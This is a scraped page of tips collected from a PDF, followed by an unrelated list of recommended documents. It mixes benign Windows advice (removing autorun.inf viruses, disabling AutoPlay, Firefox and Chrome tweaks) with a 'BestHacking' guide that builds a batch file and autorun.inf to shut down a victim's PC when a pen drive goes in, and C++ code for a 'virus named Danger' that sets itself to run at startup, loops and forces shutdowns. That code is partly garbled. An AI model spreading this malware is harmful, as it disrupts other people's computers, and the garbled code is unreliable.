DOCSLIB.ORG

In the Search Box Or Start>All Programs>Accessor Ies>Command

Total Page：16

File Type：pdf, Size：1020Kb

Download full-text PDF Read full-text
In the Search Box Or Start>All Programs>Accessor Ies>Command Go to start menu and type “cmd” in the search box or Start>all programs>accessor ies>command prompt. Open the infected drive such as write , g: to go to G drive. Now type dir/w/a . It will show all the files of the drive including hidden files. Locate AUTORUN.INF or any Virus and other suspicious files in the directory. there was no virus in my drive so only autorun.inf is been highlighted. Type command attrib -r –a –s –h to remove attributes of corresponding file. Type del autorun.inf to delete autorun.inf file. Now type del virus name.exe t delete it, eg : del newfolder.exe . (You can also delete viruses by using following steps: When you find an Autorun.inf file or any other unusual .exe file just rename it. Syntax for rename is (rename filename.extension new name , for example: (rename autorun.inf virus) to rename autorun.inf file. Here I have renamed it by “virus”. Now you can access the defected drive without affecting the virus. To delete the renamed file go to the defected drive and select the file you renamed. Now delete the harmful renamed files.) You have deleted that virus successfully but sometimes virus resides in the Recy cler folder.To locate this folder: Type cd recycler command. Again type dir/w/a to locate all file of the folder. Identify malicious files and delete them using above commands. Follow the above steps carefully and i think this information is enough to remov e a virus using command prompt easily. Important: Make sure that no other processes being running while performing thes e actions. Best of luck. -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- ----------- Hello BestHacking Readers In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted. Try It to College,school, institute....and Fun With Friends Step 1:>>copy this code into notepad: @echo off shutdown -s -t 00 Save as besthacking.bat extension (for eg: besthacking.bat). Step 2: Now open the notepad and copy this code: [autorun] Open=besthacking.bat Action=Mouse Disable Save it as "autorun.inf" Step 3: Then copy the two files in your pen drive or victim's pen drive. That's all whenever the victim insert his pen drive,the system will be turned of f automatically. Check How to Disable This:- First Stop Autorun in Your Computer And Then Format Pendrive.. And If You Stop Autorun Check My Older Post -------------------------------------------------------------------------------- ------------------------------------------------------------------------- Whenever you connect a removable media to your computer, the autorun feature of Windows 7 comes into action and immediately provides you with many options inclu ding the ‘Open folder to view files’ option. Apart from the internet, most viruses a nd malware enter the system through infected removable media. Malicious programs malware and viruses usually infects the Autorun.inf file present on the removab le media device. If you happen to connect an infected removable media device lik e USB to your computer and then make use of the ‘Open folder to view files’ option, the malware will get activated and thereby attack all the files of your system. The only way to deal with this problem is to disable the Autorun feature of Wind ows. Here are the steps on how to disable Autorun in Windows 7: Step 1. Press Windows key + R to launch the Run dialogue box. Here you need to e nter Gpedit.msc and then click on OK. Step 2. You will now see the Local Group Policy Editor on your screen. Step 3. On the Local Group Policy Editor, you need to click on Computer Configur ation > Administrative Templates> Windows Components. Under Windows Components, you will see AutoPlay Policies. Step 4. When you click on AutoPlay Policies on the left, you will also see an op tion that says Turn off AutoPlay on the right. Click on it and then choose the E dit option. Step 5. On the Turn off AutoPlay window, you need to select the Enabled option Step 6. Click on the Apply and OK buttons and to finish the disable Autorun feat ure on Windows 7. Also make sure you select the All drives option as shown on the screenshot of st ep no.5 in order to disable the Autorun feature on all drives. -------------------------------------------------------------------------------- ------------ I m gonna teach you how to make a virus named Danger... 1-Open notepad 2-Copy This code #include #include #include #include #include #include #include using namespace std; int main() { keybd_event(VK_MENU,0x38,0,0); keybd_event(VK_RETURN,0x1c,0,0); keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0); keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0); HANDLE outToScreen; outToScreen = GetStdHandle(STD_OUTPUT_HANDLE); { char buffer[255]; char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startu p\rawr.bat"; ifstream input(inputFile); if (!input) { { ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\raw r.bat", ios::app); fp fp fp } } else { while (!input.eof()) { input.getline(buffer,255); } } } { char buffer[255]; char inputFile[]="C:\rawr.exe"; ifstream input(inputFile); if (!input) { { { ofstream fp("CLICK.bat", ios::app); fp fp fp fp } system("START CLICK.bat"); main(); } } else { while (!input.eof()) { input.getline(buffer,255); system("call shutdown.exe -S"); goto START; } } } START:{ for(int i = 0; i < 1; i++) { int num = (rand() % 10); SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY); cout cout cout cout cout cout cout cout cout cout cout cout Sleep(60); } } for ( int j = 0; j < 5; j++) { SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN); int number = (rand() % 24); cout } goto START; 3-Save It As Game.Bat 4-finish -------------------------------------------------------------------------------- ------------------------ firefox fast: 1.Enable pipelining To enable it: Type about:config in the address bar > double-click network.http.pipelining and network.http.proxy.pipelining so their values are set to true > double-click network.http.pipelining.maxrequests > set this to 8. This will dramatically reduce page download times. 2.Render quickly To enable it: Type about:config and press Enter > right-click (Apple users ctrl-click) somewhe re in the window and select New > Integer > Type content.notify.interval as your preference name > click OK, enter 500000 > click OK again > Right-click again in the window and select New > Boolean > create a value called content.notify.ontimer > Set it to True. 3.Faster loading To enable it: Type about:config and press Enter > right-click in the window and select New > I nteger > Type content.switch.threshold > click OK > enter 250000 > click OK. 4.No interruptions To enable it: Type about:config, press Enter > right-click in the window > select New > Boolea n > Type content.interrupt.parsing > click OK > set the value to False and click OK. 5.Block Flash Installing the Flashblock extension will block all Flash applets from loading, w eb pages will therefore display much more quickly. 6.Increase the cache size To enable it: Type about:config and press Enter > right-click anywhere in the window > select New > Integer > Type browser.cache.memory.capacity > click OK > enter 65536 and click OK > rest art your browser get the new, larger cache. 7.Enable TraceMonkey This new Firefox feature converts slow Javascript into super-speedy x86 code. Install the latest nightly build, launch it, type about:config in the address ba r and press Enter. Type JIT in the filter box, then double-click javascript.options.jit.chrome and javascript.options.jit.content to change their values to true. 8.Compress data Install the Java applet toonel.net. It will re-route your web traffic through its own server, compressing it at the same time. It can even compress JPEGs by allowing you to reduce their quality. This comes in handy to cut your data transfer, particularly useful if you re on a limited data account service. -------------------------------------------------------------------------------- -------------------------------------------------- chrome fast: 1.Browse in Incognito Mode Browsing in Incognito Mode will ensure your browsing history or cookies won t be stored on your computer so that others using the same computer will have no clue what you did online. To enable: Go to file menu > select New Incognito Window 2.Create Customised Search Engines Most websites have downright terrible search engines. Fortunately Chrome has a w ay out. To enable: Right click in the search bar > Select Add As Search Engine > Provi de your custom search engine when prompted 3.Get more Omnibox suggestions Entering a search term into Chrome s Omnibox URL bar, it creates a pull-down lis t of a maximum of five suggestions for matching sites. To increase the number: Right-click on the Chrome icon > Select Properties > Find the Target text box > Add a space at the end of the line and omnibox-popup-count=30 4.Pinning Tabs Having a bunch of tabs opened in your Chrome window is a normal sight while brow ing, however, there s a way to pin down apps so you don t miss out on the one s that are important. All you need to do is right click on any one of the tab you re looking to pin down and choose Pin Tab. The tab will move all the way to th e left. Further, the pinned tab won t have the x option so you don t accidentl y end up closing it. 5.Hover Zoom The extension called Hover Zoom lets you see the full-size (or nearly) full-size d image of a thumbnail without actually having to navigate to the page and waiti ng for it to load. 6.Get Short Synopses of Long Articles The Chrome extension Too Long Didn’t Read It produces a synopsis of an article p iece you want to read but don t want to at the word go since it s too long.
Load more

Recommended publications
  • Genetic Databases
    Stefano Lonardi March, 2000 Compression of Biological Sequences by Greedy Off-line Textual Substitution Alberto Apostolico Stefano Lonardi Purdue University Università di Padova Genetic Databases § Massive § Growing exponentially Example: GenBank contains approximately 4,654,000,000 bases in 5,355,000 sequence records as of December 1999 Data Compression Conference 2000 1 Stefano Lonardi March, 2000 DNA Sequence Records Composed by annotations (in English) and DNA bases (on the alphabet {A,C,G,T,U,M,R,W,S,Y,K,V,H,D,B,X,N}) >RTS2 RTS2 upstream sequence, from -200 to -1 TCTGTTATAGTACATATTATAGTACACCAATGTAAATCTGGTCCGGGTTACACAACACTT TGTCCTGTACTTTGAAAACTGGAAAAACTCCGCTAGTTGAAATTAATATCAAATGGAAAA GTCAGTATCATCATTCTTTTCTTGACAAGTCCTAAAAAGAGCGAAAACACAGGGTTGTTT GATTGTAGAAAATCACAGCG >MEK1 MEK1 upstream sequence, from -200 to -1 TTCCAATCATAAAGCATACCGTGGTYATTTAGCCGGGGAAAAGAAGAATGATGGCGGCTA AATTTCGGCGGCTATTTCATTCATTCAAGTATAAAAGGGAGAGGTTTGACTAATTTTTTA CTTGAGCTCCTTCTGGAGTGCTCTTGTACGTTTCAAATTTTATTAAGGACCAAATATACA ACAGAAAGAAGAAGAGCGGA >NDJ1 NDJ1 upstream sequence, from -200 to -1 ATAAAATCACTAAGACTAGCAACCACGTTTTGTTTTGTAGTTGAGAGTAATAGTTACAAA TGGAAGATATATATCCGTTTCGTACTCAGTGACGTACCGGGCGTAGAAGTTGGGCGGCTA TTTGACAGATATATCAAAAATATTGTCATGAACTATACCATATACAACTTAGGATAAAA ATACAGGTAGAAAAACTATA Problem Textual compression of DNA data is difficult, i.e., “standard” methods do not seem to exploit the redundancies (if any) inherent to DNA sequences cfr. C.Nevill-Manning, I.H.Witten, “Protein is incompressible”, DCC99 Data Compression Conference 2000 2 Stefano Lonardi March, 2000
    [Show full text]
  • Te19 Emata Diplomovy19 Ych Prac19 2011/12
    Na´vrh te´mat diplomovy´ch a rocˇnı´kovy´ch pracı´ pro akademicky´rok 2012/13 Vedoucı´pra´ce: RNDr. Sˇa´rka Vavrecˇkova´, Ph.D. Poslednı´aktualizace: 22. rˇı´jna 2012 Upozorneˇnı´: te´ma musı´ by´t prˇed vybra´nı´m konzultova´no s vedoucı´m pra´ce. Pokud ma´te vlastnı´na´pad, je nutne´s nı´m prˇijı´t co nejdrˇı´v. Tento seznam je v aktua´lnı´elektronicke´formeˇ k dispozici na http://fpf.slu.cz/~vav10ui/obsahy/dipl/temata.pdf. DNS a ENUM (DNS and ENUM) Komenta´rˇ: ENUM (Electronic Number Mapping) je protokol vydany´organizacı´IETF, ktery´ Rezervova´no umozˇnˇuje prˇekla´dat telefonnı´cˇı´sla podle standardu E.164 na ru˚zna´URI podle existujı´cı´ch mozˇnostı´ (e-mail – Mailto, SIP, H323, ICQ, IRC, HTTP, FTP, IP adresa, atd.). Jde vlastneˇ o vytvorˇenı´a pouzˇı´va´nı´relacı´mezi ru˚zny´mi identifikacemi te´zˇe identity. Za´sady pro vypracova´nı´: IETF ENUM (Electronic Number Mapping) je protokol popisujı´cı´prˇe- klad telefonnı´ch cˇı´sel podle standardu E.164 na URI, standardizova´n jako RFC 3761. Student v pra´ci popı´sˇe princip DNS a ENUM, jejich vza´jemny´vztah, typicke´protokoly/sluzˇby, jejichzˇ URI mohou by´t cı´lem prˇekladu, na´vaznost na PSTN a VoIP, potrˇebne´protokoly, zabezpecˇenı´ proti chyba´m a beˇzˇny´m u´toku˚m, mozˇnosti vyuzˇitı´, konfiguraci ve zvolene´m DNS serveru. Zdroje: • ENUM [online]. Stra´nky organizace ITU-T. Dostupne´na: http://www.itu.int/osg/spu/enum/ • The E.164 to Uniform Resource Identifiers (URI) Dynamic Delegation Discovery System (DDDS) Application (ENUM)[online].
    [Show full text]
  • ARC-LEAP User Instructions for The
    ARC-LEAP User Instructions Appalachian Regional Commission Local Economic Assessment Package prepared for the Appalachian Regional Commission prepared by Economic Development Research Group, Inc. Glen Weisbrod Teresa Lynch Margaret Collins January, 2004 ARC-LEAP User Instructions Appalachian Regional Commission Local Economic Assessment Package prepared for the Appalachian Regional Commission prepared by Economic Development Research Group, Inc. 2 Oliver Street, 9th Floor, Boston, MA 02109 Telephone 617.338.6775 Fax 617.338.1174 e-mail [email protected] Website www.edrgroup.com January, 2004 ARC-LEAP User Instructions PREFACE LEAP is a software tool that was designed and developed by Economic Development Research Group, Inc. (www.edrgroup.com) to assist practitioners in evaluating local economic development needs and opportunities. ARC-LEAP is a version of this tool developed specifically for the Appalachian Regional Commission (ARC) and it’s Local Development Districts (LDDs). Development of this user guide was funded by ARC as a companion to the ARC-LEAP analysis system. This document presents user instructions and technical documentation for ARC-LEAP. It is organized into three parts: I. overview of the ARC-LEAP tool II. instructions for users to obtain input information and run the analysis model III. interpretation of output tables . A separate Handbook document provides more detailed discussion of the economic development assessment process, including analysis of local economic performance, diagnosis of local strengths and weaknesses, and application of business opportunity information for developing an economic development strategy. Economic Development Research Group i ARC-LEAP User Instructions I. OVERVIEW The ARC-LEAP model serves to three related purposes, each aimed at helping practitioners identify target industries for economic development.
    [Show full text]
  • Sequence Alignment/Map Format Specification
    Sequence Alignment/Map Format Specification The SAM/BAM Format Specification Working Group 3 Jun 2021 The master version of this document can be found at https://github.com/samtools/hts-specs. This printing is version 53752fa from that repository, last modified on the date shown above. 1 The SAM Format Specification SAM stands for Sequence Alignment/Map format. It is a TAB-delimited text format consisting of a header section, which is optional, and an alignment section. If present, the header must be prior to the alignments. Header lines start with `@', while alignment lines do not. Each alignment line has 11 mandatory fields for essential alignment information such as mapping position, and variable number of optional fields for flexible or aligner specific information. This specification is for version 1.6 of the SAM and BAM formats. Each SAM and BAMfilemay optionally specify the version being used via the @HD VN tag. For full version history see Appendix B. Unless explicitly specified elsewhere, all fields are encoded using 7-bit US-ASCII 1 in using the POSIX / C locale. Regular expressions listed use the POSIX / IEEE Std 1003.1 extended syntax. 1.1 An example Suppose we have the following alignment with bases in lowercase clipped from the alignment. Read r001/1 and r001/2 constitute a read pair; r003 is a chimeric read; r004 represents a split alignment. Coor 12345678901234 5678901234567890123456789012345 ref AGCATGTTAGATAA**GATAGCTGTGCTAGTAGGCAGTCAGCGCCAT +r001/1 TTAGATAAAGGATA*CTG +r002 aaaAGATAA*GGATA +r003 gcctaAGCTAA +r004 ATAGCT..............TCAGC -r003 ttagctTAGGC -r001/2 CAGCGGCAT The corresponding SAM format is:2 1Charset ANSI X3.4-1968 as defined in RFC1345.
    [Show full text]
  • Sentry Firewall CD HOWTO Sentry Firewall CD HOWTO Table of Contents
    Sentry Firewall CD HOWTO Sentry Firewall CD HOWTO Table of Contents Sentry Firewall CD HOWTO............................................................................................................................1 Stephen A. Zarkos, Obsid@Sentry.net....................................................................................................1 1. Introduction..........................................................................................................................................1 2. How the CD Works (Overview)..........................................................................................................1 3. Obtaining the CDROM........................................................................................................................1 4. Using the Sentry Firewall CDROM.....................................................................................................1 5. Overview of Available Configuration Directives................................................................................1 6. Setting Up a Firewall...........................................................................................................................2 7. Troubleshooting...................................................................................................................................2 8. Building a Custom Sentry CD.............................................................................................................2 9. More About the Sentry Firewall Project..............................................................................................2
    [Show full text]
  • Linux Networking Cookbook.Pdf
    Linux Networking Cookbook ™ Carla Schroder Beijing • Cambridge • Farnham • Köln • Paris • Sebastopol • Taipei • Tokyo Linux Networking Cookbook™ by Carla Schroder Copyright © 2008 O’Reilly Media, Inc. All rights reserved. Printed in the United States of America. Published by O’Reilly Media, Inc., 1005 Gravenstein Highway North, Sebastopol, CA 95472. O’Reilly books may be purchased for educational, business, or sales promotional use. Online editions are also available for most titles (safari.oreilly.com). For more information, contact our corporate/institutional sales department: (800) 998-9938 or [email protected]. Editor: Mike Loukides Indexer: John Bickelhaupt Production Editor: Sumita Mukherji Cover Designer: Karen Montgomery Copyeditor: Derek Di Matteo Interior Designer: David Futato Proofreader: Sumita Mukherji Illustrator: Jessamyn Read Printing History: November 2007: First Edition. Nutshell Handbook, the Nutshell Handbook logo, and the O’Reilly logo are registered trademarks of O’Reilly Media, Inc. The Cookbook series designations, Linux Networking Cookbook, the image of a female blacksmith, and related trade dress are trademarks of O’Reilly Media, Inc. Java™ is a trademark of Sun Microsystems, Inc. .NET is a registered trademark of Microsoft Corporation. Many of the designations used by manufacturers and sellers to distinguish their products are claimed as trademarks. Where those designations appear in this book, and O’Reilly Media, Inc. was aware of a trademark claim, the designations have been printed in caps or initial caps. While every precaution has been taken in the preparation of this book, the publisher and author assume no responsibility for errors or omissions, or for damages resulting from the use of the information contained herein.
    [Show full text]
  • Montagem E Manutenção De Computadores Janaina Silva De Souza
    Montagem e Manutenção de Computadores Janaina Silva de Souza Curso Técnico em Manutenção e Suporte em Informática Montagem e Manutenção de Computadores Janaina Silva de Souza Manaus -AM 2011 Presidência da República Federativa do Brasil Ministério da Educação Secretaria de Educação a Distância © Centro de Educação Tecnológica do Amazonas Este Caderno foi elaborado em parceria entre o Centro de Educação Tecnológica do Amazonas e a Universidade Federal de Santa Catarina para o Sistema Escola Técnica Aberta do Brasil – e-Tec Brasil. Equipe de Elaboração Coordenação de Design Gráfico Centro de Educação Tecnológica do Amazonas André Rodrigues/UFSC – CETAM Design Instrucional Renato Cislaghi/UFSC Coordenação Institucional Adriana Lisboa Rosa/CETAM Web Master Laura Vicuña Velasquez/CETAM Rafaela Lunardi Comarella/UFSC Coordenação do Curso Web Design Helder Câmara Viana/CETAM Beatriz Wilges/UFSC Mônica Nassar Machuca/UFSC Professora-autora Janaina Silva de Souza/CETAM Diagramação Bárbara Zardo/UFSC Comissão de Acompanhamento e Validação Juliana Tonietto/UFSC Universidade Federal de Santa Catarina – UFSC Marília C. Hermoso/UFSC Nathalia Takeuchi/UFSC Coordenação Institucional Araci Hack Catapan/UFSC Revisão Júlio César Ramos/UFSC Coordenação do Projeto Silvia Modesto Nassar/UFSC Projeto Gráfico e-Tec/MEC Coordenação de Design Instrucional Beatriz Helena Dal Molin/UNIOESTE e UFSC Catalogação na fonte elaborada pela DECTI da Biblioteca Central da UFSC S729m Souza, Janaina Silva de Montagem e manutenção de computadores / Janaina Silva de Souza. – Manaus : Centro de Educação Tecnológica do Amazonas, 2011. 114p. : il. Inclui bibliografia Curso técnico em manutenção e suporte em informática ISBN: 978-85-63576-37-8 1. Informática – Estudo e ensino. 2. Microcomputadores – Manuten- ção e reparos.
    [Show full text]
  • Official Service Contractor for The2018 International Bluegrass Music Association
    International Bluegrass Musical Association OFFICIAL SERVICE September 26 - 29, 2018 CONTRACTOR Raleigh Convention Center Hall C Raleigh, NC Information and Order Forms Table of Contents General Information General Information................................................................2, 3 Payment Policy & Credit Card Authorization.........................4 Third Party Billing & Credit Card Charge Authorization..5,6 Color Chart for Drape, Table Skirts and Carpet...................7 Decorating Services Custom Booth Packages...........................................................8 Furnishing Rentals.......................................................................9 Mailing Address: Custom Signs and Graphics...................................................10 P. O. Box 49837 Greensboro, NC 27419 Labor Cleaning Service.........................................................................11 Street Address: Installation and Dismantle Labor............................................12 121 North Chimney Rock Road Exhibitor Appointed Contractor.........................................13,14 Greensboro, NC 27409 Material Handling Phone: (336) 315-5225 Material Handling General Information............................15,16 Fax: (336) 315-5220 Material Handling Rate Schedule and Order Form.......17,18 Shipping Labels........................................................................19 2 General 2 Information HOLLINS Exposition Services is pleased to have been selected as the Official Service Contractor for the2018 International
    [Show full text]
  • Galileo Formats
    Galileo Formats October 1998 edition Chapters INDEX Introduction Booking File Air Transportation Fares Cars Hotels LeisureShopper Document Production Queues Client File/TravelScreen Travel Information Miscellaneous SECURITY Sign On H/SON SON/Z217 or Sign on at own office SON/ followed by Z and a 1 to 3 character I.D.; the I.D. can be SON/ZHA initials, a number or a combination of both SON/ZGL4HA Sign on at branch agency SON/ followed by Z, own pseudo city code and a 1 to 3 character I.D. SON/Z7XX1/UMP Sign on at 4 character PCC branch agency SON/ followed by Z, own pseudo city code, second delimiter and 1 to 3 character I.D. SB Change to work area B SA/TA Change to work area A; different duty code TA (Training) SAI/ZHA Sign back into all work areas at own office SAI/ZGL4HA Sign back into all work areas at branch agency; SAI/ followed by Z, own pseudo city code and a 1 to 3 character I.D. Sign Off SAO Temporary sign out; incomplete Booking Files must be ignored or completed SOF Sign off; incomplete Booking Files must be ignored or completed SOF/ZHA Sign off override (at own office); incomplete transactions are not protected SOF/ZGL4HA Sign off override (at branch agency); incomplete transactions are not protected; SOF/ followed by Z, own pseudo city code and a 1 to 3 character I.D. SECURITY Security Profile STD/ZHA Display security profile, for sign on HA; once displayed, password may be changed SDA List security profiles created by user (second level authoriser and above) SDA/ZXXØ List security profiles associated with agency XXØ (second level authoriser and above) STD/ZXX1UMP or Display profile STD/ followed by Z, own pseudo city code, second delimiter if pseudo STD/Z7XX1/UMP city code is 4 characters and 1 to 3 character I.D.
    [Show full text]
  • Sentry: a Multipourpose GNU/Linux
    last update: 25/ october / 2002 Sentry: a multipourpose GNU/Linux... [In this short article I'll try to explain how to made a good use of Sentry: an useful GNU/Linux distribution that can be considered like a swiss-knife tool. I'll also describe my setup experience with this distro (followed by a case-study to solve an inusual need).] What's sentry: As described in product's FAQ the "Sentry Firewall CD" is a bootable GNU/Linux based CD-ROM, useful for a number of different needs: from firewall to application server. What is meant for bootable CD-ROM is a media that contains an Operative System full installation and has a boot sector so, if PC BIOS allow it (and most recent ones do), it is possible to start PC directly from CD-ROM. The advantage to operate from CD is due, before all, to the unchangeability of the media and the consequent fast recovery of system. And therefore is impossible for a cracker (not "haker" as some newspaper define those informatical intruders) to destroy the system itself in a definitive way. One of preferred activities of cracker is, infact, the installation of a rootkit as soon as an host ahs been compromised. A root kit is, in simple words, a kit of modified programs and system utilities that allow an easy access to compromised system masking, at the same time, crackers activities. As You can understand these programs were, usually, installed on the compromised system hard disk and are very hard to remove so often is required to reinstall all system to gain a new safe situation.
    [Show full text]
  • Copyrighted Material
    23_579959 bindex.qxd 9/27/05 10:05 PM Page 373 Index Symbols alias command, 200, 331 - (dash), 109 Anaconda installer feature, 19 $ (dollar sign), 330 analog channel changing, 66–67 ! (exclamation mark), 332 Analog RBG/xVGA output, 69 # (pound sign), 330 analog SVideo output, 69 ~ (tilde), 330 analog television output, 69 antiword conversion application, 173 A Appearance settings, Web Photo Gallery New aa boot label, eMoviX boot prompt, 136 Albums page, 45 abiword word processing application, 173 appliance modules, X10 protocol, 188 abuse application, 176 applications ace application, 176 for pen drives ACL (Access Control List), 259 downloading, 171–172 acm application, 176 gaming applications, 176–177 ActiveHome project, 185 general applications, 173–174 admin directory checks, Internet radio, 287 multimedia applications, 175 Admin email address option, Web Photo running from workstations, 316–317 Gallery Email and Registration apt-get install lirc command, 92 tab, 43 ASF (Advanced Systems Format), 128 administration tools, desktop features, a_steroid application, 176 342–343 atrpms-kickstart package, 79–80 administrative settings, Heyu project, 203–204 audacity application, 175 Advanced Systems Format (ASF), 128 audio players, Internet radio, 269–270 albums authentication parameters, Icecast server, 274 adding photos to, 48, 55 Autodesk automation files, eMoviX recording bookmarking, 54 COPYRIGHTED MATERIALcontent, 129 browsing, 51 AVI (Audio Video Interleaf ) format, 128 comments, adding, 54–55 creating, 47 B naming, 47 backend setup and startup, MythTV project slideshow settings, 46 configuration, 62, 110–113 summary additions, 48 backups, 29, 291 thumbnail images, 51 bad flag options, BZFlag project, 229 title creation, 48 bad words, managing, BZFlag project, 233 23_579959 bindex.qxd 9/27/05 10:05 PM Page 374 374 Index ■ B bandwidth consumption, Internet radio, 273 burning barrage application, 176 CDs Basic option, Devil-Linux firewall Main eMoviX project, 134–135 Menu, 253 MoviX2 project, 142–143 Battle Zone capture the Flag.
    [Show full text]
  • Arc Welding Solutions from ESAB
    Arc Welding solutions from ESAB ESAB Welding & Cutting Products / esabna.com / 1.800.ESAB.123 A full line of arc welding equipment for every application, industry and environment. Arc Welding Equipment Table of Contents Description Page Description Page Process Description .....................................................2 Genuine Heliarc® Tig Torches Arc Welding Equipment Selection Guide ...................4 Heliarc Tig Torch Selection Guide ................................56 Compacts (power source with built-in wire feeder) Gas-Cooled Torches Caddy Mig C200i ............................................................6 HW-24 ...................................................................57 Migmaster™ 215 Pro/280 Pro .........................................8 HW-90 ...................................................................59 MIG, DC Power Sources, CV/CVCC HW-9 .....................................................................61 Aristo™ Mig U5000i .......................................................10 HW-17 ...................................................................63 Origo™ Mig 320/410 ......................................................12 HW-26 ...................................................................65 Origo Mig 4002c/6502c ................................................21 Water-Cooled Torches Wire Feeders - Semi-Automatic HW-20 ...................................................................67 MobileFeed™ 300AVS .....................................................15 HW-18 ...................................................................69
    [Show full text]